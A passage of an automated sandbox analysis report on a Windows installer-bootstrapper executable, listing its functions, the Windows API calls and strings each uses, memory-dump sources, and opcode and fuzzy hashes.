                                                                                                                                                                    • Part of subcall function 00436AF7: FindFirstFileW.KERNEL32(00000000,?,0000001C,00000000,00000000), ref: 00436B32
                                                                                                                                                                    • Part of subcall function 00436AF7: FindClose.KERNEL32(00000000), ref: 00436B3E
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,000003BC,00000000,00000000,00000000,000003D8,000000F8), ref: 00436AE9
                                                                                                                                                                  Strings
                                                                                                                                                                  • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00436A28
                                                                                                                                                                  • PendingFileRenameOperations, xrefs: 00436A54
                                                                                                                                                                  • \, xrefs: 00436A72
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseFind$FileFirst
                                                                                                                                                                  • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$\
                                                                                                                                                                  • API String ID: 1228951600-2982801162
                                                                                                                                                                  • Opcode ID: 2fa20e09d43153cc7653e58aab7b14967fd7aaded15a56537a40913437181dd2
                                                                                                                                                                  • Instruction ID: 71b8515636a2caa15830fa1f0484a9845a5509e70fc5fe1661e6d2bae9fcb839
                                                                                                                                                                  • Opcode Fuzzy Hash: 2fa20e09d43153cc7653e58aab7b14967fd7aaded15a56537a40913437181dd2
                                                                                                                                                                  • Instruction Fuzzy Hash: CE31B13190011AFEDF21BF94CC41AAFBBB5EF09354F16D06BE901B6291D7B89A40DB58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004020A3, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,?,000000FF,00000030,00000000,00000030,00402EC5,00402EC5,?,0040203E,00000030,?,00000000), ref: 004020DF
                                                                                                                                                                  • GetLastError.KERNEL32(?,0040203E,00000030,?,00000000,00000000,00000007,00402EC5,?,00404461,?,?,?,00000030), ref: 00402108
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareErrorLastString
                                                                                                                                                                  • String ID: Failed to compare strings.$variable.cpp
                                                                                                                                                                  • API String ID: 1733990998-1686915864
                                                                                                                                                                  • Opcode ID: de8632b9c419e2c0ed15f731937d2361bf9a6267bb249893118279125300b9a9
                                                                                                                                                                  • Instruction ID: 9ac7115aba07b0bd7b1df277c5614d858889c87aed4b9058604b9298860e962e
                                                                                                                                                                  • Opcode Fuzzy Hash: de8632b9c419e2c0ed15f731937d2361bf9a6267bb249893118279125300b9a9
                                                                                                                                                                  • Instruction Fuzzy Hash: 68212632750225EBC7109F988D45B5AB7A4EF48760B21022AEA29FB3C0D6B4DD028798
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041F6EC, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,000003D8,00000000,000000F8,000002A8,00020019,00000000,000000F8,00000000,?,?,?,0041FA2A,00000000,00000000), ref: 0041F7AB
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to initialize package from related bundle id: %ls, xrefs: 0041F788
                                                                                                                                                                  • Failed to ensure there is space for related bundles., xrefs: 0041F753
                                                                                                                                                                  • Failed to open uninstall key for potential related bundle: %ls, xrefs: 0041F718
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$Failed to open uninstall key for potential related bundle: %ls
                                                                                                                                                                  • API String ID: 3535843008-1717420724
                                                                                                                                                                  • Opcode ID: a3c5477fdce27c2cccc7aba4dac3cbfb78b7ad00e234f3e2ab354aff39b8cd23
                                                                                                                                                                  • Instruction ID: 4199e22d0339bac205f37f21cc7776b7bb368dc15542c5ac7b26f45a4dc5ad5e
                                                                                                                                                                  • Opcode Fuzzy Hash: a3c5477fdce27c2cccc7aba4dac3cbfb78b7ad00e234f3e2ab354aff39b8cd23
                                                                                                                                                                  • Instruction Fuzzy Hash: FB21F536500215FBDF019E90DD41BEE7B74FF04314F104026F920A6190C739DE96DB88
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00430F66, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61filestringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • lstrlenA.KERNEL32(004079F6,00000000,00000000,00000000,?,?,0043083A,004079F6,004079F6,00000000,00000000,0000FDE9), ref: 00430F78
                                                                                                                                                                  • WriteFile.KERNEL32(FFFFFFFF,00000000,00000000,00000000,00000000,?,?,0043083A,004079F6,004079F6,00000000,00000000,0000FDE9), ref: 00430FB4
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0043083A,004079F6,004079F6,00000000,00000000,0000FDE9), ref: 00430FBE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastWritelstrlen
                                                                                                                                                                  • String ID: logutil.cpp
                                                                                                                                                                  • API String ID: 606256338-3545173039
                                                                                                                                                                  • Opcode ID: ed25141eb9041b31cdf6c9186ed72ab614b9d47eac1ab725b1fb28927174b92a
                                                                                                                                                                  • Instruction ID: fd0f665acbb82e8a62d6a29105d9c3d648580a4fbc24987b8781bcab2b47789a
                                                                                                                                                                  • Opcode Fuzzy Hash: ed25141eb9041b31cdf6c9186ed72ab614b9d47eac1ab725b1fb28927174b92a
                                                                                                                                                                  • Instruction Fuzzy Hash: 5711E9326002216BC7709A66DC59E9FBA6CEB497A1F115327FD01E7280D7B8DD00C6F8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00430651, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FormatMessageW.KERNEL32(00000900,0043B580,00000000,00000000,00000000,00000000,?,00000000,?,?,00430D04,?,00000000,0043B580,?,00000001), ref: 00430670
                                                                                                                                                                  • GetLastError.KERNEL32(?,00430D04,?,00000000,0043B580,?,00000001,?,00402017,?,0043B580,00000000,?,?,00401DB6,00000002), ref: 0043067C
                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,00000000,00000000,?,?,00430D04,?,00000000,0043B580,?,00000001,?,00402017,?,0043B580), ref: 004306E4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                  • String ID: logutil.cpp
                                                                                                                                                                  • API String ID: 1365068426-3545173039
                                                                                                                                                                  • Opcode ID: 1e8d9c6f1fd778d5ac8fd3fc8fec22c0656e23431bac2113b5139718ce16d91f
                                                                                                                                                                  • Instruction ID: 92bcded8edb758bd735558f5dfbbb4b85a800da5fb43a669480a02dcfcef6249
                                                                                                                                                                  • Opcode Fuzzy Hash: 1e8d9c6f1fd778d5ac8fd3fc8fec22c0656e23431bac2113b5139718ce16d91f
                                                                                                                                                                  • Instruction Fuzzy Hash: 8311E731601215FFCF21EF91CD16EEF3A69EF88710F00511AFD0196164D7748A20D7A8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004233C9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00423D9D: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?,00000000,?,004233F8,?,?,?), ref: 00423DC5
                                                                                                                                                                    • Part of subcall function 00423D9D: GetLastError.KERNEL32(?,004233F8,?,?,?), ref: 00423DCF
                                                                                                                                                                  • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?), ref: 00423406
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00423410
                                                                                                                                                                  Strings
                                                                                                                                                                  • cabextract.cpp, xrefs: 00423434
                                                                                                                                                                  • Failed to read during cabinet extraction., xrefs: 0042343E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLast$PointerRead
                                                                                                                                                                  • String ID: Failed to read during cabinet extraction.$cabextract.cpp
                                                                                                                                                                  • API String ID: 2170121939-2426083571
                                                                                                                                                                  • Opcode ID: f0a69aaa30ffdb129f78ee06d2de956639fc5696c0b547df1a91dd50e1c9ace7
                                                                                                                                                                  • Instruction ID: 815fc96b96e1b0a63c41ce54294b75d3ac77e83c7ce49aa61b83bc4cf05f7dd6
                                                                                                                                                                  • Opcode Fuzzy Hash: f0a69aaa30ffdb129f78ee06d2de956639fc5696c0b547df1a91dd50e1c9ace7
                                                                                                                                                                  • Instruction Fuzzy Hash: 5C018E32A00225ABDB119FA5ED05E9A7BE8FF08754F01012AFD04E7150D734DA118AD8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0043731C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(0040A33A,40000000,00000001,00000000,00000002,?,00000000,000000B8,00000000,?,0040A33A,?,00000080,?,00000000), ref: 00437334
                                                                                                                                                                  • GetLastError.KERNEL32(?,0040A33A,?,00000080,?,00000000,?,?,?,?,?,00000001,000000B8,00000000,00000001), ref: 00437341
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,?,?,0040A33A,?,00000080,?,00000000,?,?,?,?,?,00000001), ref: 00437395
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                  • API String ID: 2528220319-2967768451
                                                                                                                                                                  • Opcode ID: 14e0d9a6c29eca662435dc26a02260183dbb5a684e2ed0dbb3113ed6f1992a20
                                                                                                                                                                  • Instruction ID: ce001eac0dd346a3df73af09c8ae9bc96612eee642ba94387405cf2008dfb54e
                                                                                                                                                                  • Opcode Fuzzy Hash: 14e0d9a6c29eca662435dc26a02260183dbb5a684e2ed0dbb3113ed6f1992a20
                                                                                                                                                                  • Instruction Fuzzy Hash: 9E01F732644220BBDB311E6A9C05F6F3A95DB89B71F111322FE54AB1E0C7788C11E6E9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0043701A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,00000080,00000001,00000000,00000003,00000080,00000000,000000F8,00000000,?,0041F84D,00000000,000003D8,000000F8,BundleCachePath,00000000), ref: 0043704E
                                                                                                                                                                  • GetLastError.KERNEL32(?,0041F84D,00000000,000003D8,000000F8,BundleCachePath,00000000,000000F8,BundleVersion,00000090,000000F8,EngineVersion,000000F8,00000088), ref: 0043705B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateErrorFileLast
                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                  • API String ID: 1214770103-2967768451
                                                                                                                                                                  • Opcode ID: 312364f2cef6c21260df137d07d952bba95cddd9bbbaf42f59ebc8f454325591
                                                                                                                                                                  • Instruction ID: 2dc5bee75ad5849f2673d6126b8323e4538da28bc8bc0087f8b9de64bdc8b7f3
                                                                                                                                                                  • Opcode Fuzzy Hash: 312364f2cef6c21260df137d07d952bba95cddd9bbbaf42f59ebc8f454325591
                                                                                                                                                                  • Instruction Fuzzy Hash: 130126326803207AE73026B5AC09F6B65A8DB09BA1F110223FE44FA1E0C6A84C0156E9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00401036, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(00401C5F,?,00000000,?,?,00401C5F), ref: 0040105B
                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(00401D2F,?,?,00401C5F), ref: 00401064
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,004020E3,004020CB,?,?,00401C5F), ref: 00401082
                                                                                                                                                                    • Part of subcall function 00431E0F: OpenProcessToken.ADVAPI32(00401C5F,00000008,00000000,00401C5F,77A19EB0,?,00401C5F), ref: 00431E2D
                                                                                                                                                                    • Part of subcall function 00431E0F: GetLastError.KERNEL32(?,00401C5F), ref: 00431E37
                                                                                                                                                                    • Part of subcall function 00431E0F: CloseHandle.KERNEL32(00000000,?,00401C5F), ref: 00431EC0
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to initialize engine section., xrefs: 004010AD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalInitializeProcessSection$CloseCurrentErrorHandleLastOpenToken
                                                                                                                                                                  • String ID: Failed to initialize engine section.
                                                                                                                                                                  • API String ID: 2976607596-2559398028
                                                                                                                                                                  • Opcode ID: bf1b1d73ac6d4859ddb8ba960890a4474fa2c9ba45f764ff32390a7dd8056ea7
                                                                                                                                                                  • Instruction ID: 7250781b836ba982a66c2a82f2ddb56ff275e3d30b5e84c93e6f653326a531b4
                                                                                                                                                                  • Opcode Fuzzy Hash: bf1b1d73ac6d4859ddb8ba960890a4474fa2c9ba45f764ff32390a7dd8056ea7
                                                                                                                                                                  • Instruction Fuzzy Hash: CC014CB2A00619ABCB04ABB5DC46ACEB3ACFB45314F10022BF614E7191D778F6048BD8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00423D9D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?,00000000,?,004233F8,?,?,?), ref: 00423DC5
                                                                                                                                                                  • GetLastError.KERNEL32(?,004233F8,?,?,?), ref: 00423DCF
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to move to virtual file pointer., xrefs: 00423DFD
                                                                                                                                                                  • cabextract.cpp, xrefs: 00423DF3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                  • String ID: Failed to move to virtual file pointer.$cabextract.cpp
                                                                                                                                                                  • API String ID: 2976181284-3005670968
                                                                                                                                                                  • Opcode ID: 2ed93dc8a3f04c71a3c7e116e27a36227d53f8e321418d651bb77ca7f8e340ab
                                                                                                                                                                  • Instruction ID: e686d558b56cbc5ba11f8c23d88fea5da76380e35dea383e73f1293f09a46b09
                                                                                                                                                                  • Opcode Fuzzy Hash: 2ed93dc8a3f04c71a3c7e116e27a36227d53f8e321418d651bb77ca7f8e340ab
                                                                                                                                                                  • Instruction Fuzzy Hash: 0801A236B00635BBDB215E56AC04A97FBA4EF057A1B11822BFD08A7150DB29DD208AD8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00431C19, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(r@,?,00000104,?,00000104,?,00000000,00401C5F,?,004072ED,?,00000000,?,?,?,00401C5F), ref: 00431C3A
                                                                                                                                                                  • GetLastError.KERNEL32(?,004072ED,?,00000000,?,?,?,00401C5F,77A19EB0,00000000), ref: 00431C51
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastModuleName
                                                                                                                                                                  • String ID: pathutil.cpp$r@
                                                                                                                                                                  • API String ID: 2776309574-2262669586
                                                                                                                                                                  • Opcode ID: c752e22be57477ea3fbdb64b6cfcc685329649ebca9501a527df3aeb3a375c76
                                                                                                                                                                  • Instruction ID: b164ed7c58fcc094d8ba045b94ba885cf7668d5a8f2a611dff733f47953c1065
                                                                                                                                                                  • Opcode Fuzzy Hash: c752e22be57477ea3fbdb64b6cfcc685329649ebca9501a527df3aeb3a375c76
                                                                                                                                                                  • Instruction Fuzzy Hash: 77F0FC326402306BD7216A675C48F57F6DDDB59760F112223FD04EB160C769DC0085F8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00417ABE, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38threadwindowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to post elevate message., xrefs: 00417B1E
                                                                                                                                                                  • EngineForApplication.cpp, xrefs: 00417B14
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastMessagePostThread
                                                                                                                                                                  • String ID: EngineForApplication.cpp$Failed to post elevate message.
                                                                                                                                                                  • API String ID: 2609174426-4098423239
                                                                                                                                                                  • Opcode ID: 284bf98951fa4d123ae7410ace091c2a2738075018d8b46749b20f08b7a1886f
                                                                                                                                                                  • Instruction ID: fec9a5764ed0a95159e8436210ccaa3ceed1fb97d93756a141acd7d6eaa99efb
                                                                                                                                                                  • Opcode Fuzzy Hash: 284bf98951fa4d123ae7410ace091c2a2738075018d8b46749b20f08b7a1886f
                                                                                                                                                                  • Instruction Fuzzy Hash: 6DF09632745220ABE6246A699C09B9777D4DF08764F11822BFF58EB1D1DB299C028BDC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00408A85, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetProcAddress.KERNEL32(C68B5F08,BootstrapperApplicationDestroy), ref: 00408AAC
                                                                                                                                                                  • FreeLibrary.KERNEL32(C68B5F08,?,004014A5,000000B8,?,?,?,00401EA4,?,?), ref: 00408ABB
                                                                                                                                                                  • GetLastError.KERNEL32(?,004014A5,000000B8,?,?,?,00401EA4,?,?), ref: 00408AC5
                                                                                                                                                                  Strings
                                                                                                                                                                  • BootstrapperApplicationDestroy, xrefs: 00408AA4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressErrorFreeLastLibraryProc
                                                                                                                                                                  • String ID: BootstrapperApplicationDestroy
                                                                                                                                                                  • API String ID: 1144718084-3186005537
                                                                                                                                                                  • Opcode ID: 8e06cfeacb8f6d9aa695c4cc869f9908c0da6436ee217f3fb15272a99c55a332
                                                                                                                                                                  • Instruction ID: 4c017244b0989c74abc4ff4a4fbd421b7292c4fa02e923bbe2ec34002cac5aae
                                                                                                                                                                  • Opcode Fuzzy Hash: 8e06cfeacb8f6d9aa695c4cc869f9908c0da6436ee217f3fb15272a99c55a332
